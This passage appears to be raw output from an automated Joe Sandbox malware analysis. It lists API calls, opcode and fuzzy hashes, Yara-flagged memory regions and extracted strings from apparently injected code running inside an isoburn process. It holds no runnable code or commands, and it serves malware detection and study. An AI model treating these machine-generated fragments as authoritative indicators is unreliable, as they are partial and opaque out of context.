                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7d253c207cf608864781150c02fa101c650ec8aecb307f72012329a24615a4ca
                                                                                • Instruction ID: c8d444f8d07083092541e43800fec737e6569eddf2fb523f221079059dc32158
                                                                                • Opcode Fuzzy Hash: 7d253c207cf608864781150c02fa101c650ec8aecb307f72012329a24615a4ca
                                                                                • Instruction Fuzzy Hash: C490023160550402F1407158491574710099BD0205F65D411A0C26578D8795DA5169E2
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: cc63982ade9815f2d5dbf371b663e8e584c85823ff2408470ad20ff78ac4fe2f
                                                                                • Instruction ID: e3b406bb7cd2cd0dc374dba5ba9aa26ae3eade4282b63a56cb523a248d7f68d1
                                                                                • Opcode Fuzzy Hash: cc63982ade9815f2d5dbf371b663e8e584c85823ff2408470ad20ff78ac4fe2f
                                                                                • Instruction Fuzzy Hash: DA90027160150042618071584C054476009ABE1305395D115A0D56570C8618D95596A9
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: db6dd404e2bbf19dd38d6dd74be4fdf003044ebdb88f27f4c6f1dcfb0d2b2171
                                                                                • Instruction ID: ccbd07f46d8f0186e7a1ae80c6c70083efffffda8a4283c882398ca58b7fb326
                                                                                • Opcode Fuzzy Hash: db6dd404e2bbf19dd38d6dd74be4fdf003044ebdb88f27f4c6f1dcfb0d2b2171
                                                                                • Instruction Fuzzy Hash: 6690023160580012B18071584C855874009ABE0305B55D011E0C26564C8A14DA5657A1
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7f034f440e8307f2e8e4df8716ab041ee2419a143f730148144fb35506c713f5
                                                                                • Instruction ID: bce7f31df428f28bd383c574b094bea87012ca8d62d695a9f708af6989ff9b18
                                                                                • Opcode Fuzzy Hash: 7f034f440e8307f2e8e4df8716ab041ee2419a143f730148144fb35506c713f5
                                                                                • Instruction Fuzzy Hash: 2990023120140402F1407598580968700099BE0305F55E011A5826565EC665D9916571
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3d429d4b3b1eab72c70aba48e160a74a63c1eedf48b6b40b9ac040054bf80603
                                                                                • Instruction ID: d1d5ef12b29d39a4287f0c14d0a2ea12ae1c765bdda0d7acd288d900053ff365
                                                                                • Opcode Fuzzy Hash: 3d429d4b3b1eab72c70aba48e160a74a63c1eedf48b6b40b9ac040054bf80603
                                                                                • Instruction Fuzzy Hash: F490023120140842F14071584805B8700099BE0305F55D016A0926664D8615D9517961
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7571d35f4dd2ba3d22249454bbdfa5dcadbd70b2cacc96a0c20c82ba4f25bb4b
                                                                                • Instruction ID: 692481e70e641f39be8d5ae2360d501dda39f1b1cbcc65a14798d5c5020f0b30
                                                                                • Opcode Fuzzy Hash: 7571d35f4dd2ba3d22249454bbdfa5dcadbd70b2cacc96a0c20c82ba4f25bb4b
                                                                                • Instruction Fuzzy Hash: 1990023120148802F1507158880578B00099BD0305F59D411A4C26668D8695D9917561
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: eea6a693922ed72ff90fd8fffa22198610b06c9dea3da6fbe926199f593598be
                                                                                • Instruction ID: 833e354eb0230ffbca18862fa4b8f5128c41685eacede9ebad7488f9de1ec8cd
                                                                                • Opcode Fuzzy Hash: eea6a693922ed72ff90fd8fffa22198610b06c9dea3da6fbe926199f593598be
                                                                                • Instruction Fuzzy Hash: 6E90023120140413F15171584905747000D9BD0245F95D412A0C26568D9656DA52A561
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: fbbfcad054cd8ce41526aea77b4ed2e04883d7d21c9a6e3a52941befb542432d
                                                                                • Instruction ID: 1cabaf8223d917030af644b282014772de4a9db4a5078526bb754febbeadf0c8
                                                                                • Opcode Fuzzy Hash: fbbfcad054cd8ce41526aea77b4ed2e04883d7d21c9a6e3a52941befb542432d
                                                                                • Instruction Fuzzy Hash: 09900231242441527585B1584805547400AABE0245795D012A1C16960C8526E956DA61

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A49E25
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID: ")$#$#$$u$'$-$-~$.$@k$H$T$Z/$]5$f?$pa$r$vj$}$K
                                                                                • API String ID: 2422867632-999386047
                                                                                • Opcode ID: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                                                • Instruction ID: 54b490f78a96428fb48dd66b51fb873a00caa3909f9e3826bb15dd921417ccdf
                                                                                • Opcode Fuzzy Hash: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                                                • Instruction Fuzzy Hash: 4C8168B0D05769CBEB20CF85C9597DEBAB1BB45308F1081D9D15C3B281CBBA1A89CF95
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeUninitialize
                                                                                • String ID: @J7<
                                                                                • API String ID: 3442037557-2016760708
                                                                                • Opcode ID: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                                                • Instruction ID: 437562d68a14be04118f64ebd19506079776e4fc4ba01ef16fb16ba9a937a4b2
                                                                                • Opcode Fuzzy Hash: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                                                • Instruction Fuzzy Hash: 734142B5A0020AAFDB00DFD8D880DEFB7B9FF89304B148559E915E7614DB74AE45CBA0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeUninitialize
                                                                                • String ID: @J7<
                                                                                • API String ID: 3442037557-2016760708
                                                                                • Opcode ID: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                                                • Instruction ID: eb65618f8fcb5b8a8b9127608f117f00a6b4a80d468ade13865649268d5666bd
                                                                                • Opcode Fuzzy Hash: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                                                • Instruction Fuzzy Hash: 423121B5A0060A9FDB00DFD8C8809EFB7B9BF89304B108559E915E7214DB75EE45CBA0
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 02A63A5B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: wininet.dll
                                                                                • API String ID: 3472027048-3354682871
                                                                                • Opcode ID: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                                                • Instruction ID: 44864ca2dbcb255d9dd6b39221dac732e97f8490403033dd74bd65e6401ae070
                                                                                • Opcode Fuzzy Hash: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                                                • Instruction Fuzzy Hash: 3231D0B0600605BBDB14DFA4CC88FFBB7B9EB88714F50451DE919AB240CB70AA41CFA4
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A544D2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                • Instruction ID: 6bba6dfa9eb678604cc7fe664146cd365dba259ee084eff69b60b48b7f118fe2
                                                                                • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                • Instruction Fuzzy Hash: CD011EB5E8020DBBDB10DFE5DD85FAEB3799B44708F0041A5AE1897241FA31EB54CB91
                                                                                APIs
                                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A5820E,00000010,?,?,?,00000044,?,00000010,02A5820E,?,?,?), ref: 02A69813
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInternalProcess
                                                                                • String ID:
                                                                                • API String ID: 2186235152-0
                                                                                • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                                • Instruction ID: 3eae40862f2628e217d7c0e29ed0ddc311bdcd8ecdafad449685112bb7e9f47b
                                                                                • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                                • Instruction Fuzzy Hash: 6C0184B6204648BBCB54DE9DDD80EDB77ADAF8C754F518108BA19E3241DA30F8518BA4
                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A49E25
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                                                • Instruction ID: b76c44efc33336ef173895653897b9e38956609c48d85d99c34c7ff9866ba832
                                                                                • Opcode Fuzzy Hash: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                                                • Instruction Fuzzy Hash: DFF0307338031436D22062E99D02FD7B68D8B94B65F540015F61CEA2C0DEA1F44146A5
                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A49E25
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                                                • Instruction ID: 2a4fa4684c50116ee658b81c055e47edea1f68bbfabd05cf1f18debc14fbebfc
                                                                                • Opcode Fuzzy Hash: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                                                • Instruction Fuzzy Hash: C0F06D7228131432E23062A98D42FD7769D8B95B61F540015F618EB2C0DEA5F84186F9
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(02A51969,?,02A657BB,02A51969,02A6556F,02A657BB,?,02A51969,02A6556F,00001000,?,?,00000000), ref: 02A6970C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                • Instruction ID: c3bc6ddddc60f30d0ed2398e19e4872075c29f7e33115b6b58145e5e04a5cbdc
                                                                                • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                • Instruction Fuzzy Hash: 9BE065B6244204BBD714EE98DC44FAB77ADEFC8750F004009F90CA7282EA30B9108BB4
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5DE58B5E,00000007,00000000,00000004,00000000,02A53CE4,000000F4), ref: 02A6975C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                • Instruction ID: 05fd37b57ee7a2acf7ed43711d2bc761be8418f5a9d4be530814d6329eb71a15
                                                                                • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                • Instruction Fuzzy Hash: AAE06D76240205BBD614EE58DD45FAB37ADDFC8710F004418F908A7242DA70B9518AB4
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02A5827C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                                                • Instruction ID: c2af5b275158baab22337858710913559c929ecd2ea01f54a113109bf1d0927e
                                                                                • Opcode Fuzzy Hash: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                                                • Instruction Fuzzy Hash: 14E0DF352403082AEB206AA89C85FAA33489B48728F4C0660BD6CCB2C1EB38E8814590
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02A51C50,02A67EAF,02A6556F,02A51C1D), ref: 02A58073
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                                                • Instruction ID: f57c3865d4e64ed877d2b412d1398e126a05e7987370b485b3b789634fcc6c5f
                                                                                • Opcode Fuzzy Hash: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                                                • Instruction Fuzzy Hash: C5E0C2B12811002EF310AAB89C0AFA6328C6BA4718F4000A8B51CE7281DF74E0404564
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02A51C50,02A67EAF,02A6556F,02A51C1D), ref: 02A58073
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                                                • Instruction ID: ced4ff8ce0899153b3be1a407cfa6941eb844d68d96ea13c9e7878de9a5d7362
                                                                                • Opcode Fuzzy Hash: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                                                • Instruction Fuzzy Hash: D1D05E712802083BF610B6F99C06F96368D5B44768F844064BA0CE72C2EE64F04045B5
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(?,00000111), ref: 02A50D47
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                • Instruction ID: bab76e2b8a79c1cb150c58c4e10dc52857d3799f57368d8ea5f914d0f446bdd3
                                                                                • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                • Instruction Fuzzy Hash: AED0A76770011C36A60145846CC1DFFB75CDB847A5F004063FF08D1040D621590206B0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732574046.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4bd0000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732574046.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4bd0000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                • API String ID: 0-3558027158
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                Strings
                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04ED4725
                                                                                • Execute=1, xrefs: 04ED4713
                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04ED4742
                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04ED46FC
                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 04ED4787
                                                                                • ExecuteOptions, xrefs: 04ED46A0
                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04ED4655
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                • API String ID: 0-484625025
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732574046.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4bd0000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$^V^Y
                                                                                • API String ID: 0-2612338985
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-$0$0
                                                                                • API String ID: 1302938615-699404926
                                                                                Strings
                                                                                • RTL: Re-Waiting, xrefs: 04ED031E
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04ED02BD
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04ED02E7
                                                                                Memory Dump Source
